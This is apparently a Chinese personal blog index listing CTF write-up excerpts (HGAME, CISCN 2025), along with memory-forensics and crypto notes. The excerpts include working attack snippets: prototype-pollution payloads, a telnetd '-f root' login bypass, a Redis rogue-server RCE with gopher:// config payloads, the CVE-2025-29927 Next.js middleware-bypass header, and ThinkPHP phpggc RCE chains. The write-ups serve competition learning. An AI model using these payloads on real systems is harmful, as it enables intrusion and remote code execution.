hatchet的个人博客

Web 魔理沙的魔法目录 要求读1个小时以上的书 三个路由/login、/record、/check 直接伪造时长就秒了 hgame{YOU-AR3_AIso-A_m4H0u_T5UKa1-N0W!6beb4} Vidarshop 这题想象程度有点大 发现uid可以伪造，但其实我们注册1dmin/1就等于拿到了admin权限 update假设存在原型链污染，即使用了类似javascript的merge函数 payload { "__init__": { "__globals__": { "balance": 99999999 } }} hgame{Re41@dmIn-Mu5Tb3R1ch4a22f04af8} 博丽神社的绘马挂 XSS注入读取管理员的绘马，里面有flag。 注意一下Sec-Fetch-Dest check。参考一下网址里查找的方法，把请求写成javascript。请求头会有Sec- ...

宿主机 telnet 开启漏洞服务 sudo apt-get install inetutils-telnetd telnetsudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.confsudo /etc/init.d/inetutils-inetd start 攻击机 -r不填默认23端口 USER='-f root' telnet -a 192.168.1.1 -r 32791

也是进线下半决赛了汲汲爆 关注我们队的逆向手谢谢喵 Error 的小破站 题解 CISCN2025 汲汲爆战队题解 心里话 这次出题审核组杀的够狠，也看到了黑榜上的一些熟面孔。260个名单，反挂效率大于ace了属于。iscc快去学（恼），你是个啥国家赛事啊，丢嗨客的脸，打个iscc2025都恶心把题解发出来。 这么一杀，半决赛的师傅们应该会正义不少吧，水分少的情况下更要努力准备了。

下载攻击文件 Redis(<=5.0.5) RCE git clone https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server.git wget https://github.com/n0b0dyCN/redis-rogue-server/raw/refs/heads/master/exp.so 把exp.so复制到文件夹里 开启服务器 python3 redis_rogue_server.py -v -path exp.so -lport 1028 攻击 redis gopher 已知密码为123456 (可选)关闭redis只读(read only replica) gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520replica-read-only%2520no%250d%250aquit 设置dir gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520se ...

WEB Tomwhat 题目部分源码 // LightServlet.javaprotected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String username = req.getParameter("username"); if ("darth_sidious".equalsIgnoreCase(username)) { req.setAttribute("error", "Forbidden username."); doGet(req, resp); return; } req.getSession().setAttribute("username&qu ...

next_js 中间件绕过 cve-2025-29927 请求头加上 x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware 出现新的 Etag，替换一下给 If-None-Match，然后访问/dashboard 即可 小知识 connect.sid 类型的 Cookie，常见于使用 Express.js 搭配 express-session 中间件构建的 Node.js 应用 原型链污染 原型链污染, 过滤了 __proto__, 用 constructor.prototype 绕过 ejs 模板注入 https://www.anquanke.com/post/id/236354 { "username": "admin", "password": "123456", "constructor": { "prototyp ...

5.0文件写入漏洞 https://www.anquanke.com/post/id/196364 5.2RCE漏洞 ./phpggc -u ThinkPHP/RCE1 'system("cat /flag");' 6.0RCE漏洞 ./phpggc -u ThinkPHP/RCE2 'system("cat /flag");'

因为2025年ciscn长城杯和ccsssc都考了很多内存取证题，都占到做题四分之三了。所以被迫开坑了。这是纯被逼的。。。 Lovelymem使用 使用建议加群获取，虽然开源了，但是群里还是分享了取证工具如vol和gimp，免得一个个找了。 接下来的题目都是在边刷边记录，加油。 PC’s name and IP address PC’s name vol2 python2 vol.py -f OtterCTF.vmem --profile=Win7SP1x64 printkey -K "ControlSet001\Control\ComputerName\ComputerName" Lovelymem 系统信息 WIN-LO6FAF3DTFE IP address vol2 python2 vol.py -f OtterCTF.vmem --profile=Win7SP1x64 netscan Lovelymem 网络信息 192.168.202.131 更新中。。

冲鸭汲汲爆！！ Web upload?SSTI! 源码： import osimport refrom flask import Flask, request, jsonify,render_template_string,send_from_directory, abort,redirectfrom werkzeug.utils import secure_filenameimport osfrom werkzeug.utils import secure_filenameapp = Flask(__name__)# 配置信息UPLOAD_FOLDER = 'static/uploads' # 上传文件保存目录ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'}MAX_CONTENT_LENGTH = 16 * 1024 * ...

今年 Crypto 和 Web 都出了一题，比去年爆零有进步吧。 Crypto rasnd apbq+Crypto Lost_N 两道原题拼起来的 # Challenge1from tqdm import tqdmimport itertoolsimport gmpy2from Crypto.Util.number import *hints = [ 25574573929402935003283598068738618755197114816072485544111430127084604255064057898619020315793700619773020002231218663688600225987728493417652915285636730495107205389701731029171639528818049528850061176609364551478844661947985471969548086609584476215158971602178073047143790222773356597741788285217431876038197253930422 ...